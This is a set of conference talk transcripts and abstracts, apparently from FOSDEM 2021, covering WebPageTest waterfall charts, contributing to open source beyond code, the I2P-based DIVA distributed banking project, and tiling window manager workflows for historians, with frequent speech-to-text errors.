under HTTP2. First thing to mention is how the overall waterfall looks a lot cleaner. There's now only a single TCP connection on request number one used for all asset downloads. There's not as much download chunking as prioritization is happening over a single connection. Under the hood Chrome sets the exclusive flag for the stream dependencies on each resource so it downloads the assets in order from a long internal list. Here's an interesting observation. We seemingly have a single rogue DNS lookup on request 17 but it has no associated connection and SSL negotiation or the orange and pink color bars. This is actually HTTP2 connection coalescing in action. The assets domain and the root domain are in different domains but they are on the same underlying infrastructure. Then both share the same IP address and SSL certificate. So the browser can use the existing TCP connection and SSL negotiation that was established on request number one. Therefore all assets will download over the same single connection even though they are on separate domains. Note the bandwidth from 1.1 to 3 seconds is maxed out. We don't have the gaps over this time period we did with HTTP1.1. This is useful work being done by the connection. If I quickly flip back and forth between the two you really get to see the difference between the waterfalls. Here we see that the web page test has exposed the internals of how the browser downloads a page under specific conditions. If I were to run the same test through Firefox or IE this picture would look very different. Briefly going back to the subject of download chunks again there's a very simple way to see the data that powers this chunk visualization. Clicking on the request you want to examine you'll see a raw details tab. This is the tab I mentioned before. This tab gives you all the JSON related to this particular request. Scrolling down in this tab you'll see the chunks array. This array contains multiple objects. Each object contains a timestamp of when the chunk completed not started and the number of bytes downloaded in this chunk. Web page test works backwards from the completed time. It then looks at the number of bytes downloaded and the available bandwidth at the time to calculate the chunk width to be displayed on the visualization. Next up are errors and status codes. Web page test will make it very obvious when it comes to when it encounters status codes other than 200. Just a brief note on the chart used in this example it's very easy with a JavaScript and asset heavy paid for a chart to be hundreds of requests long. In this example many requests have been omitted from the waterfall chart to make it more readable. These omitted requests can be identified by the three dots highlighted in green. Look for the customize waterfall link under the waterfall diagram to do this. Back to our error and status codes. So request one to ten are all fine. There are 200 status codes. Requests 99 and 101 are error codes. The red background may have given this way. In this case these are from 400 response codes. This refers to a bad request. The status code is seen in brackets after the request timing data. The timing value seen is the time taken to complete the request. This includes a TCP connection negotiation if required but excludes wait time. Requests 123 to 130 are 302 status codes and I've seen with the yellow background. The 302 code is the found but temporarily moved status code. Notice that the browser still has to set up expensive TCP connections in a few instances just to receive this 302 status code. This is certainly something to watch out for when using third parties. Next up a recent addition prompted I believe by Andy Davies. Each request comes with a document value in the details panel that tells you where the request was initialized from. Requests two to five are initialized from the root document as the text is black. Requests 11 and 28 are from new HMR documents. Notice how the asset is in blue and note that the text is also in blue to signify they have a new document value. So the request was initialized from somewhere other than the root document. This is most likely an iframe in this case. Notice further down our request 47 to 49 are also blue. These are assets being downloaded by the iframe. The blue request text doesn't only happen with iframes, it also happens with service workers and all the assets that they load. And here's how it's displayed in the details panel when clicking on the requests. The top image is we see is the root document. The bottom image is the third party iframe from Google with a different document value. I mentioned the pink lines for JavaScript execution earlier. The JavaScript execution can be seen in pink on the request row which treated. In this example we see a solid block of pink. But is this very intensive JavaScript running or just short fast repeated execution? Looking at the pages interactive bar below it gives an indication in this example since it is solid red. But a recent JavaScript visualization has made this feature even more useful. Now when JavaScript execution is rendered you don't always just see a solid block of pink. The height of the pink bars indicates how quickly the JavaScript run. So fast but frequent JavaScript execution will have very short height bars. So they no longer dominate the view. You can actually see this in the example. This functionality is only available in Safari and Chrome and Chrome base browsers. Firefox doesn't expose this information. Wouldn't it be great if you could add your own custom markers to the waterfall chart to see where certain events happened during page load? It's actually quite simple. Just use the mark method in the user timing API and add it to your page code. These marks will be shown on the waterfall chart as vertical purple lines. These user timing marks don't show up in the default waterfall chart on the public instance of WebAge test. But if you have your own custom instance they can be enabled by default. The only way to see them using the public instance is to view the waterfall using the customized waterfall link below the waterfall chart which I mentioned earlier. That's the view you can see in the slide. The reason for this is because many third parties leave these marks in their code, meaning there will be a lot of noisy looking waterfall charts when using third parties. And last point on this, the actual timing for each of these events is shown just below the summary table for the test run. So let's quickly look over some scenarios and see what else we can learn. Now you may have seen this pattern in previous slides I'm sure but I just I'm pointing out to you. When running a test using Chrome the resulting waterfall will have a common pattern. This pattern is called the stair step. The top step can be seen in red, the bottom step in black. So what's happening here? This is essentially a separation between the assets in the head and the body. It's a prioritization strategy Chrome uses to improve performance. Chrome will dedicate most CPU and bandwidth to getting the page head set up before then concentrating on assets in the body. This is an example on the HTTP 1.1. Notice the TCP connection at request 15. This request is for an image that is located in the body but it's being requested at the same time as the head assets. So Chrome isn't completely ignoring the body but resources in the head are the priority. So I mentioned earlier about the CPU graph at the bottom of the waterfall chart. So here's an example of what can happen to a waterfall chart when the device is CPU limited. Looks fairly standard until you look closely then you will notice the gaps between the requests. These gaps on requests 24 to 26 show a large amount of inactivity that has a huge impact on performance. If you examine the CPU graph directly below these gaps it points to the reason why they are happening. The graph is maxed out at 100% over this time period. But we see the opposite in the network activity. There's really nothing happening at all. Examining the browser main thread there's some script parsing and execution in orange. There's some paid layout tasks in purple but nowhere near an activity to cause the CPU issue seen here. So something odd is going on. I'm afraid I don't have an explanation as to why the CPU is maxed out in this instance mainly because it was a low spec device that was having issues. But it shows how useful the other graphs can be when used in conjunction with the waterfall chart. And finally an unusual waterfall that cropped up in a government service recently. I've actually written a whole blog post about this waterfall chart and what was happening with it. We speak up to Monash R services at GDS. These tests run every day and look for web performance issues. On this service we saw the number of fonts being downloaded literally double overnight from three to six. Nothing had changed, no releases, no code deployed. It just happened randomly. Examining the graph you see the font size double. In fact the historic graph data shows that this issue had randomly happened and fixed itself many times in the past. If we look at this waterfall it gives some insight into what's happening. Looking at requests 12 to 14 for the WAF2 fonts you'll see this really strange set of gaps between the download chunks. Now it took a while to figure out exactly what was going on here but long story short we weren't serving the very origin header with our fonts. So the CDN cache was being poisoned and serving up the fonts with incorrect header. Essentially another device was connecting. The headers for this device were being cached and then served to our test browser which was another device. The browser was seeing these incorrect headers and immediately rejecting the fonts. You can actually see all this happening in the waterfall. So requests 12 to 14 are made for the WAF2 fonts. Very thin slices of data are received back from the server which is probably the headers. The browser immediately cancels the requests. This is seen in the waterfall by the light red color simply disappearing. Almost immediately after this happens the browser makes a request to the fallback WAF2 fonts. This then doubles up the number of font requests and increases the bytes being sent to the browser. The dark red patches that now look to be floating are likely to be data that was already in one of the various buffers between the server and the browser and already in transit so couldn't be cancelled. This is just an example of how much information you can get from a waterfall chart once you understand some of the internals. Without speed curve and web page test this would have been almost impossible to identify and fix. As we come into the end of the talk now you may be asking where kind of go if I want to find out more information. Here's a list of links and various resources if you want to find out more about web page test. There's some shameless plugs in there from me as well as talks from Pat Meenan and Andy Davis. I'll share these slides after the talk. So this talk is based on a blog post I've written called How to Read a Web Page Test Waterfall Chart. I did the research and pulled the information together for this post but I've had lots of input from folks in the web performance community with corrections, additions and general advice. So a big thank you to all these lovely folks. All their twitters are listed. They are worth a follow if you don't already. I hope you found this talk useful. Thanks for listening and if we have time I'm more than happy to try and answer questions that you may have. We'll start from the top then. When you go through the waterfall chart what's the first thing that you look for? So the first thing I would look for is probably the actual width of the waterfall chart. That gives you an idea of how long it took a page to load and if you're particularly looking at things like large images they're going to have a large solid block that's going to take a large amount of time so you can quickly identify the large assets on your page by looking for these large blocks that take a very long time and that's the same with JavaScript and with fonts as well. If they're quite extended then you can immediately see okay I have an unoptimized image here or I have a ton of JavaScript that I can potentially identify and optimize. That will probably be one of the first things I looked at. So you spent a lot of time now and writing about waterfall charts so do you see anything that should be improved or is it something that you are missing that you want? There's I'm always annoying Pat meaning I'm sort of constantly talking to him about various things. I have a couple of large screens in front of me which are very wide so one thing I would love to be able to do is to maximize that space the actual view of web page test is quite thin at the moment so whether there'd be a setting to sort of maximize the view so you can really utilize all of the space on bigger screens. I'd also like the ability to export well you can export data you can export the JSON from the test and from all the test runs as well but it would be great to actually be able to export that hold that somewhere and somehow import it at a future date to then actually go back into it should the test be deleted for some reason or you lose a test so you have this ongoing record of those tests. Those would probably be a couple of I don't know whether there'd be the only other thing I think I've already mentioned to Pat is about quickly being able to rerun a set of tests but with slight modifications so you run a test with a test setup and you say you want to change the label to say it says HTTP 1 instead of HTTP 2 or I want to just change one particular setting the ability to do that would be really really useful to be able to sort of test and compare later. Okay cool so and one question from Tim what are your default settings for the network when you do your runs and why? So I do a lot of testing of gov.uk and our services at GDS we've got various services here I have access to or everyone has access to the crux data crux dashboard that you can look for a domain and we show a round about 2.4 percent of our users are on a effective 3g connection so I often set it to 3g just to get an idea of okay for
WebPageTest is one of the most well known and important tools in the web performance community. It's been actively developed by Pat Meenan since he worked at AOL in 2008. It has become the go to tool for both very simple to very advanced debugging of the web performance of a website. One of its most well known charts is the waterfall chart. In this talk I'm going to introduce the waterfall chart and also go into detail on how you can examine and read it. The more you understand about the chart, the the more WebPageTest as a whole will be able to help you fix a slow performing website.
10.5446/52840 (DOI)
Hi, everyone. Welcome to First Dem 2021. I'm going to be giving a lightning talk on contributing beyond code and it's going to be like my six months or rather eight months review so far with contributing to open source. Okay, I'm Ruth Ikega and I'm from Nigeria and I'm a back-end developer. I'm also a technical writer and I'm part of the GitHub Stars program as a GitHub star. So let's go into my journey. Let's take a dive into my journey so far with contributing to open source. So yeah, so this is a screenshot. I'm not sure it's so visible but this is like a screenshot of a first suite. I made a tweet about the first contribution I made to open source. It was with the first contributions on GitHub, the repository where you just add in your name to the contributors list. So after the contribution I made a tweet about it and gained over like 202 likes and so many people congratulating me just for like putting in my name on the contributors list and this was like the start of my journey. So WOSCA here means Women of Open Source Africa, Community Africa. So this is an initiative from the open source community here in Africa and an NGO called the Chicode Africa community where the idea of this initiative was actually to spur women into contributing to open source, women in Africa into contributing to open source and like this was like the start of the initiative that was in June. So there was this challenge somehow similar to Hacktoberfest where you in the month of July to get some pull requests and at the end of the month the person with the highest number of pull requests gets a domain name for free. So I participated in this challenge as the start of my open source journey and when I participated in this challenge I think I was the highest number of pull requests and it was like the start of something beautiful for me in the open source space and just adding in, chipping in, I was like three months into like coding and I was still a beginner at that point so there were like so many challenges for me starting for so far. I counted how much open source has actually helped me, helped my technical skills, helped me personally. I would say it has been an amazing right for me so I'll be sharing like a step by step, step by step how I contributed and those these organizations that I found that I found welcoming and I am currently part of. So the first community I engaged in was the GNOME community. So there's this project, the scalable onboarding project is headed by Sri. So this project is actually like how to do scalable onboarding, how do we better onboarding in the GNOME community and that was like the first project, the first open source project I looked at and it was not a code project right so it was just less common, less discourse how onboarding has been in the GNOME community. Let's gather data, let's gather metrics that will help better onboarding in the GNOME community and so this project was really really interesting at the start and like I said earlier I was just like three months into coding and GNOME uses GitLab so starting off I at least I knew GitHub, I knew how to use GitHub or I knew what GitHub was but I had to learn of another one which is GitLab right. So initially contributing was a whole lot of stress like I had so many Git problems like I think the first pull request I made to the GNOME project was I think I fucked the repository like I cloned and fucked the repository like up to five times just like make in one pull request because I kept deleting and adding and it was a whole lot of frustrating. So that was like the first project I got involved in in GNOME and over time I am still part of some other projects like the extensions, booted initiative and I contributed to GNOME. I think the last last year, Gwadec, I was part of like the volunteers in the Gwadec 2020 conference and it was really an amazing experience for me right. So finding GNOME and the people around the project I was contributing to like Shui, Samson, Regina which was really very awesome because I felt welcome. It was not, it was not contributing code at the point but I still felt welcome and my ideas were heard and I improved the project in the way I could. So next I want to talk about the second community like I found which is the layer five community, the service merge community and it was really very welcoming to me and I think the first pull request I made to the layer five community was on the readme. So there was this change that was needed across the readme on each repository. So I was able to like change those, change those typos and enhance the readme and the community so far has been welcoming and I even got to join the onboarding program which we call the mesh maze program where we help newcomers and new contributors to get get conversant with the layer five project and all our everything around the community. So another project I really got involved with is the chaos project and I joined the diversity and inclusion working group and so far like I've done so much in a short while with the diversity and inclusion working group in particular. Like I remember last year we started defining a metric about burnout which is something in open source communities people do not really like talk about and I've been able to like actively contribute to this to the diversity and inclusion working group and the metric is still in process, is still in review and I hope soon it will be out for others like check it out and talk about like burnout in their communities. So secondly there's the project in the chaos space that's called the badging projects like D&I, the diversity and inclusion badging project and basically what that project is about is for starters we stay with conferences giving diversity and inclusion badges to conferences that are diverse and inclusive and it's something you really should check out and I'm sure that you'd be happy and you'd be impressed with what we've been doing at the badging project. So far contributing to open source and contributing beyond code I have some code contributions too but I think like 80% of my contributions so far to open source has been all non-code contributions right and so far I have improved skills that I listed out here one which is empathy. So far with contributing and helping others I have applied empathy because sometimes when you hop into a project like a new project for newcomers it's usually very frustrating right getting around the dogs getting around the code base so with my contributing to these open source organizations and the project I have been able to help other newcomers, other contributors get their way around the community, get familiar with the community, I have applied like empathy, I have tried to be patient with helping out and holding and the rest of them. I have improved public speaking, I have tried to like speak advocate for new contributors I have I think so far I've like last year 2020 I spoke like I think up to eight conferences they're about an event so so far I have gained public speaking skills I have also improved writing in documentation because most of the projects I contribute to I have helped in improving the dogs, in checking, in giving reviews, in looking at what can be changed and what should be changed. I have also improved in moderating so with my volunteering at conferences I have volunteered and I have moderated like I think our last year with the Alton's Open Conference I think I volunteered yeah I volunteered with the Alton's Open Conference and I moderated a particular a particular room for like I think six hours straight and so over time even in the layer five community service mesh community I contribute to there's we also we always do a newcomers call every Thursday and I'm part of the persons that moderate that call and so far it has been like it has been interesting and I've got to improve my skills and most importantly people's skills right so I have learned how to like manage people better how to how to talk how to be inclusive especially how to how to include other people how to manage people how to care for orders right so these are the skills and I think many more that I have been proud I have I have gained so far rather in contributing to open source and it's beyond the code right so aside the fact that yes that code contributions are really really important yeah but contributing to open source is beyond code and it's it's so much there's so much to do in the community there's so much to help around there's a contributor that is being frustrated somewhere on the code base about the code base that you can help with which is what I have been focusing on for like the past six to eight months and the biggest recognition for me so far is being like the biggest recognition so far with contributing to open source was when I like joined the GitHub Stars program and I found out that I was like the first female GitHub star in Africa and it's something it's something that that that is really really dear to me because so far with my contributions they were they were not just code but I helped the community I helped the people around the community I applied so much empathy and that's like that's basically what got me to this point that I am in so for someone listening right now I would say open source for me is not just about the code it's about community it's about helping others it's about improving people's life through software so in your community in your project try to appreciate those that are not contributing code try to make them feel welcome try to make them feel loved and appreciated and I love to end this talk with this code that says open source is not just about the code and you can contact me on Twitter at Ikega Ruth via email or you can check out my GitHub handle and thanks for listening to my talk I hope you enjoy the rest of the conference thank you
Starting my contributions as a beginner in tech was an amazing journey and really something worth sharing because I was able to contribute beyond the code by actively helping out other beginners get involved. It took me from submitting talks about including beginners in OSS, making explanatory blog posts, tweeting about OSS, getting involved in onboarding teams to improve the process, and even having one on one calls to help out others get involved. In this talk, I will be sharing my challenges, strategies, and accomplishments so far highlighting my biggest recognitions which is joining the Github Stars program.
10.5446/52841 (DOI)
Hello and welcome. My name is Conrad. I'm from Diva. This talk is about an I2P-based, fully distributed bank. That's about free banking technology for everyone. At Diva we're creating technology, enabling, storing, transferring and trading any existing or future digital values. All we're doing at the association is licensed on the HEPL version 3 or Creative Commons. So it's a truly open source and free technology project. The agenda of this talk consists of seven items. We're starting with the association Diva. We're continuing with the scope of this project, so what's free banking technology? We continue with privacy and anonymity layer I2P, the network stack. We're looking at the storage, the fully distributed storage, which is a blockchain. The backend, the business logic is interesting. The front end, the user experience where we are today, this is terrible important. And last but not least, I'd like to introduce you to the Diva community. I hope you enjoyed this talk, so let's get started. The association Diva on exchange. We're an association known as the Swiss Law, located in Switzerland. There are two founding members, it's Carolyn and myself. And there are other members because it's free and open to everyone. So please join. Currently there is also a membership fee. So please join the association Diva on exchange. All we're doing is licensed on the HEPL version 3 or Creative Commons. So all our technology is in the public domain. We're independent, we're agnostic or scientific and all we're doing is 100% yours. So there is nothing like a central service involved. We're fully distributed. All our technology is fully distributed, not decentralized. Fully distributed. And we're relying on donations as an association. So please donate your work, donate cryptocurrencies or just join the association first. Take a closer look at what we're doing. Clarity, transparency, openness, that's really, truly important to us. You find the association on the website, Diva.exchange. Now what's free banking technology? What's the scope of Diva? The network is the market. And in this network we have nodes. And each node is a bank in this market. That's kind of the core thinking concept. Every user which is forming such a node can enter or leave the network anytime without losing data, without losing digital value. That's also important to end users. That's very important. So it's borderless. There is nothing like a walled garden. Diva is borderless. And every user is running its own software, the Diva software on its own device and it's form and it's forming such a node. The network itself is a peer-to-peer network so that the users, the nodes, can exchange the digital values. They can pay with it. So it's a payment network, it's a trading network, and each user can store the digital values on its own device. The peer-to-peer network is based on I2P, or taking a closer look later on the I2P, which is giving full privacy to the end user within the Diva network. This is important on such a market. Since every user is forming its own node and its own bank, every user can also keep transaction fees of those transactions, which are done on his node, which are processed on his node. Remember, we do not have any coin or any token involved. There is nothing like a Diva coin or a Diva token. We're bought or less, we're not a walled coin. So every user is keeping its own transaction fees in its own choose, digital value. The network layer of Diva is based on I2P. I2P is a long-standing open-source project and it's focusing on building, providing the software to build a private network. And this functionality is very important to Diva because the nodes within the Diva network are private. They do not know each other, but they want to communicate with each other. If you're looking at I2P, then each package which is leaving a node and traveling to a different node in a network is hopping over different other nodes. And its response from the destination is also hopping back over different nodes. This makes it very difficult. For example, to spy out traffic by a man in the middle or by a provider. And this is one of the important features of I2P. And I2P is resistant towards a wide spectrum of attacks on the network. And also this resistance and since I2P is long-standing, it is the preferred choice for Diva. Scientific projects supported by Diva, together with universities in Switzerland, help us to better understand and to better research the I2P network. Since it's our underlying technology, we run regular scientific research on it. Also again, this year, where a new project is researching I2P. So, we're supporting these efforts. We're doing these efforts because I2P is giving the privacy by design to Diva. Free banking technology requires some storage, because transactions or the books, the digital values must be stored locally. And since Diva is truly and fully distributed, it has to be a redundant storage and a redundant, reliable storage in that blockchain. Whereas, since Diva has no central component at all, as I said, not even a DNS, we needed also to have a truly distributed storage solution and we decided to go together with the IROHA OpenSource team. IROHA is a very light-white, highly energy-efficient blockchain technology. It's using the yet another Consensos algorithm, so it's not a proof-of-work or a proof-of-stake algorithm. It's just the fault tolerance and that's exactly what we needed. It was light-white, it was fast and it wasn't stable. So, we helped the IROHA team in the past months to stabilize their technology. Additionally, we added our code on the HEPL, by the way, to make it permissionless. So, today we have a permissionless storage framework, which works very well for Diva. Additionally, again, together with universities and schools, we have projects which are trying to break our storage, to inject malicious nodes, to be hostile and to destroy Diva. That's important to us, so again, the security focus is to take a very close look together with schools and universities to get a deep understanding of how the storage layer is working, on the which conditions and its problems. I'd like to show you the Blockchain Explorer, which we have written for IROHA. It works for every IROHA blockchain, so not only for the Diva network. We have written this to visualize the Blockchain a bit better, to show the blocks and to show the peers and domains and roles and stuff, which is important to us as developers of Diva. You can find this Blockchain Explorer at our testnet, liveontestnet.diva.exchange. Diva has a backend. The backend is the business logic. Some people also call this protocol, but this business logic contains the way, the rules, how the bank is working, how the application is working. There are things like how does an order book look like, how does a transaction look like, how is it stored on the blockchain, how is the communication working with I2P, stuff like that. This backend forms the bank. This backend is written in JavaScript. We decided to go for JavaScript because we believe that JavaScript has quite a broad developer base and its entry level friendly. Since we want to create free banking technology for everyone, we also wanted to have a low entry level on the backend so that it's not super complicated to get started as a coder, as a developer. We believe that JavaScript is a possibility to reach this target. We try to write very elegant, modern and understandable code in JavaScript. It's well documented, we have nice standards and all contributors are very, very welcome. You'll find our code on codeberg.work.diva.exchange.diva. This is a github repository. Codeberg.work is very open source friendly and they're an association in Germany. So as we are an association in Switzerland, Diva, there is codeberg.work. All right, so please take a look at codeberg.work.exchange.diva, sign up and give us some stars. Help us to deal on the backend. We would really appreciate that. The front end of Diva needs some love. The user experience is important, especially for free banking technology for everyone. So it should be accessible and good looking for the majority of the user base. It's very lean, it's written in HTML, CSS and JS. It has not many dependencies. There is a dependency to Bulma, which is a CSS library and dependency to Umbrella.js. So it's really very lean, for example, the whole trading interface just has a weight of below 400K uncompressed. So it's really fast, it's really lean. We're looking for support, for some support. We're looking for user experience, people who want to help us to make this front end look great. And since we're all the backend people, we're all blockchain and storage and I2P guys, we really like some help in the area of front end. So please talk to us over our platform Diva.exchange, there you find our contact details. Talk to me, talk to Caroline, but get in touch with us if you're a user experience kind of person and help us with the user interface of Diva. Now I'd like to do a quick tour in the user interface of Diva so that you have seen where we are today. You see here the trading functionality, so the order book. The order book consists of a bid and an ask site that's buying and selling, that's a bit fine, let's talk. And you see how the challenges are in the user interface. This has to look much nicer, that's what we believe. The functionality is here, so you can add orders to buy, for example here, it's the BTC Monero, the Bitcoin Monero pair, just as an example. So you can add some buy orders and you can add some sell orders and then your personal order book will be displayed and the order book of the market will be displayed below. The backend is then writing the data on the blockchain. So now you have seen the state today of the front end and now you understand why the front end needs some love. We're almost through with this talk. Last but not least, I'd like to introduce you to the Diva community where we all learn and evolve. We're a very friendly, open-minded and highly diverse community of software developers, of creatives, of writers and even an artist. This community is very friendly to newcomers, so please join us, we help you board in this train. Because there is lots of stuff in this Diva box. There is user experience challenges, there are blockchain challenges, I2P stuff, there is scientific work, because never forget we're independent, we're agnostic and all we're doing is 100% of yours. So you get involved in this HGPL version 3 project, in the software project, as a developer, as a creative, as a writer. Now last but not least, I'd like to show you a picture of an independent German artist. He's called Mond Stern, he's also active on Codeberg.org and he's painting real pictures on canvas and these pictures to contain icons or logos of open source software. So here is the picture, the acrylic on canvas of Diva.Exchange and it's created by the artist Mond Stern. Thank you very much, thank you for your valuable time, thank you for your continuous support of open source software and you're great. Music playing Music playing Music playing Alright. Music playing Music playing Music playing Hello everyone, thank you for listening, joining this talk. I'd like to start with the questions. So the first question I see here on the screen is, is this a bank or an exchange? I don't really get it. Since it's fully distributed and every bank gets an exchange, so it's both to be honest, very early stage. I must also say we're a fully distributed bank because the distributed values are stored locally, digital values are stored locally and since every bank can do transactions together with other banking partners in the peer-to-peer right to peer network, it's an exchange. Right. I took this question first because I hope it clarifies quite a bit that banking and the exchange is kind of similar stuff, or it's the same for us. Right. What are the known limitations of peer-to-peer decentralized banking? Which typical banking business processes cannot be provided this way? That's the next question. We have millions of limitations. We're quite at the beginning of our project. So we're writing code, we're writing documentation, we're writing papers together with universities to better understand what's possible. The very first thing we're doing is we're trying to implement this trading functionality. You too, the age and the way cryptocurrencies are established, like just to take any two, like Bitcoin or Monero, we want to integrate first the swap and we want to try out this swap first in a fully distributed way. It's a trustless network, so we have to solve quite some challenges on the way together with our research partners and also for ourselves. So there are many, many limitations. We don't think yet about credit, business or stuff like that. Let's focus first on trading and which is the same for us as also payment. So we try to focus on that. Now, next question, which currency is used for banking? Evo itself, we're not a coin, we're not a currency. We do not have any business model at all. So every node which is running a bank is keeping the transaction fees on his own.
Imagine: I2P (aka "Darknet"), a highly energy-efficient, new and fully distributed storage engine, some basic banking business logic and a fresh user interface. Result: a highly privacy-respecting, in theory secure, yet very slow, personal bank. Meet diva.exchange - the first non-profit, non-corporate, very-small-tech and research-driven association developing "Free Banking Technology - For Everyone". All licensed under AGPLv3+. The presentation is about the technology stack of the truly distributed free banking technology "DIVA". It's also about the fact that "distributed technology" does not offer anything like a "business model" in the old-fashioned-cloudy way. It's about the overlay network "I2P". It's about the distributed storage engine "Iroha" and the challenges with a very slow network. It's about banking business logic, the user interface and its challenges being fully distributed. And it's about the research co-operations in Switzerland. DIVA is small and local tech for everyone.
10.5446/52843 (DOI)
Hello everyone, my name is Corey Steffen and I am currently a PhD candidate in the Department of Theology at Marquette University in Milwaukee, Wisconsin, United States. My presentation is titled Free and Open Source Software for the Professional Histories, Optimizing a Multisource Historical Research Workflow in BSD or GNU-Linux with a Tiling Window Manager and Manuscripts Galore. Thank you for having me. Many professional historians research and write with rather haphazard desktop or laptop computer setups. Perhaps it is natural for the sort of mind that thrives on piecing together minutiae from historical documents to tend to be different from the sort of mind that thrives on learning to use cutting edge technology. However, the busy scholar cannot afford to work without keeping as many tools for efficient research and writing in her toolbox as possible. For example, the operating system for historians working with myriad large documents ought to be lightweight and stable. I have had my Ryzen power desktop with 16GB of RAM crash because I was manipulating a manuscript facsimile that used 13GB on its own. And I have had a regression in LibreOffice Fresh render a work in progress dissertation chapter unable to be edited until I downgraded to LibreOffice Still. Needless to say, neither moment was pleasant. Most big name open source operating systems that are not completely rolling release are well suited for the job such as FreeBSD, Debian, or Manjaro, but the scholar must take care to use long term service kernels and software whenever reasonably possible. Beside the operating system, the window manager is the most important part of the historian's toolbox. For multi-source historical research and writing, the use of a dedicated tiling window manager can improve efficiency quite dramatically. Faximiles, database query tools, and other items that one might need to have opened simultaneously in various windows are placed exactly where one intends rather than in a random location like in stacking window managers and therefore most traditional desktop environments. Moreover, no windows are allowed to overlap and each window occupies all the screen space allotted to it. There are dozens of tiling window managers available for the X-window system atop the BSDs and GNUD Linux. Generally, they can be placed inside one of two broad categories, manual and dynamic. Manual tiling window managers, which require the user to specify exactly where each window ought to be placed, have an advantage with regard to precision. Yet, they tend to be too tedious for multi-source historical workflows. Dynamic tiling window managers, which position windows automatically, are both simpler to use and more efficient for the kinds of tasks that we undertake. 100% accuracy is less important for the scholar than being able to have a lot of windows open at one time without any overlap. Thus, I recommend a dynamic tiling window manager. As for which of the many dynamic tiling window managers is best, I must remind my audience at the free and open source developers European meeting that most of us professionally studying history are not software developers. Thus, window managers that require deep programming or scripting to customize are not viable. Among the many perfectly fine remaining options, the ubiquitous i3WM and the lesser known SpectreWM are noteworthy because they have human readable plain text configuration files, which are almost as familiar at first look for a historian accustomed to reading ancient lists and ancient languages as I imagine that they are for a system administrator accustomed to editing free BSDs beautiful configuration parameters. These are the two window managers that I am going to showcase today using my current workflow within which I combine the two as a case study. On my desktop, I run i3WM and on my laptop, I run SpectreWM. I use my laptop as an extension of my main desktop workflow with the open source KVM switch imitator barrier, which allows me to seamlessly use the same keyboard and mouse with both. Here is my blank i3WM desktop setup on my 27 inch 4K display. There's quite a bit of screen real estate, but smooth workspace switching is still helpful. I have my recording tools on workspace 8 for example to leave 7 workspaces for what I am about to show. The center of my workflow is the glorious triad of LibreOffice, Firefox, and the citation management tools of Tiro, each of which I open with a quick keystroke. All that I have to do is type mod plus control plus z to open Zotiro, then mod plus control plus L to open LibreOffice, and finally mod plus shift plus F to open Firefox. There are many ways to automate this in most tiling window managers, including i3, but I find that I like to open each window application window on my own, just a little less automation for the sake of being able to decide exactly what I would like to have running during a given study session. I do all of my writing in LibreOffice Writer Still Branch with light text on a dark background. As an example, here is my presentation for today. I use extensions for LibreOffice to help with spell checking my various research languages. The ancient Greek extension deserves special praise for its wide array of features and decent accuracy with the range of Greek that I need to quote from Attic to Coine to Byzantine. The Latin, French, and German dictionaries that I have installed are all quite helpful as well. Thousands of extensions and templates for LibreOffice are available in the official repository. Now it might sound obvious to use Firefox as probably almost everyone here does, but there is more to it when it comes to scholarship than simply using a good web browser. Extensibility is what makes Firefox amazingly powerful for academic research and writing. I have 13 extensions and 9 user scripts installed in Firefox on my desktop, most of which help me with work in some way. These include tweaks for the desire to learn learning management system that my university uses, markdown here so that I can write most HTML5 messages in plain markdown, refined GitHub to help me navigate resources on everybody's favorite Octocat, and more. For dissertation writing, the official Zotero extension, Zotero connector, and Leechblock NG are two of the most important extensions. The former pairs my web browser with my citation management tool, and the latter, Leechblock, helps me stay focused on the task at hand rather than wasting time in multimedia websites. Zotero handles Chicago style notes and bibliography, humanities citations quite well. The official Zotero extensions for Firefox and LibreOffice work together so smoothly in fact that occasionally I am able to add an entry to my dissertation's running list of works cited from my home institution's library website in Firefox with one click and then actually cite it in the target location with only one more. Otherwise, I might have to spend a few minutes with cleanup inside Zotero, but then I do not have to worry about the particular source being cited properly for the rest of the dissertation. Save odds and ends like dashes, semicolons, italics, things of that kind. Beyond LibreOffice Firefox and Zotero, each scholar will need to use his or her own specific research tools. I have found GitHub and GitLab to be the best places to search for them. I am specifically a historical theologian, which means that I study Catholic theology in history. Thus, I often run searches to see what kinds of utilities people are writing for theology, religious studies, the history of Christianity, Greek, word parsing, and so on. For anyone who might be interested to read what my favorite projects of that kind are, please feel free to visit the awesome theology curated list of open source software for Catholic theology that I have made on GitHub. One of many things that is specific to my work is the need for aids for analyzing different translations of various parts of the Bible. I use both graphical user interface and command line interface biblical study tools. For GUI, I use either Bible Time or ZIFOS, depending on whether I am using a mostly QT or mostly GTK setup respectively. At the core, Bible Time and ZIFOS are both GUI front ends for the sword project. Here I am showcasing Bible Time. There is nothing quite like having Greek, Latin, German, and English versions of a particular passage open side by side for comparison with the ability to copy and paste any of the text. I keep the CLI tools permanently open on my laptop. Here is my typical window configuration in the simple Spectre WM installation that I have on my laptop, pulled up by trusty old X11 VNC. You will see that I have three CLI Bibles open, Greek Bible GRB, which contains the full text of the Septuagint and the Greek New Testament, and for example you will see Mark 1, Vole which contains the full text of the Vulgate Latin Bible, and so for example there is Mark 1 again, or else I might open Vulgate, so Vul, John 316, a classic verse, and KJV which contains the full text of the King James Version English Bible, and then I also have Mark 1 open again. I also make extensive use of William Rittaker's words, which you see on the left side of this screen, which is an old, trusted Latin word parsing tool that is kept alive by a dedicated group of users and developers in one central GitHub repository. So for an example of using this, I could see John 316 starts with C, type C, and then I see it's an adverb that means thus, so, and so on. Finally, I have various shell aliases on both systems to launch what I need automatically. For example, if I need to open St. Thomas Aquinas' Opera Omnia, or Complete Works, and the Elinx CLI web browser hosted locally, I simply type Tom. If I need to open Ranger directly to the file directory in which I keep all of my dissertation documents, I type Diss. A minute saved here, a few seconds saved there, and by the end of the day, I have saved enough time to accomplish a little task that I otherwise would not have been able to accomplish. Mine is the fact that I am required by circumstances at my home institution to use Microsoft Teams for communication. My historical research and writing software toolkit is 100% Libre. Moreover, it is highly efficient, not despite the fact that, but rather precisely because all of its contents are free and open source software. Being able to customize every piece of software in my toolkit means that I can make it my own multi-source historical research and writing toolkit, specifically optimized for my own scholarly work. For the next few minutes, I will respond to questions. Please feel free to ask anything that you might like to ask. Thank you.
For historical research and writing, the use of a dedicated tiling window manager and other customizable FOSS tools improves efficiency. With a bit of work, manuscript facsimiles, database query tools, and other items that a historian might need to have opened simultaneously can be sorted exactly how he/she wishes, freeing crucial time from organization for proper analysis. In this presentation, I explain how to optimize a multisource historical research workflow inside a tiling window manager with an entirely libre software toolkit.
10.5446/52845 (DOI)
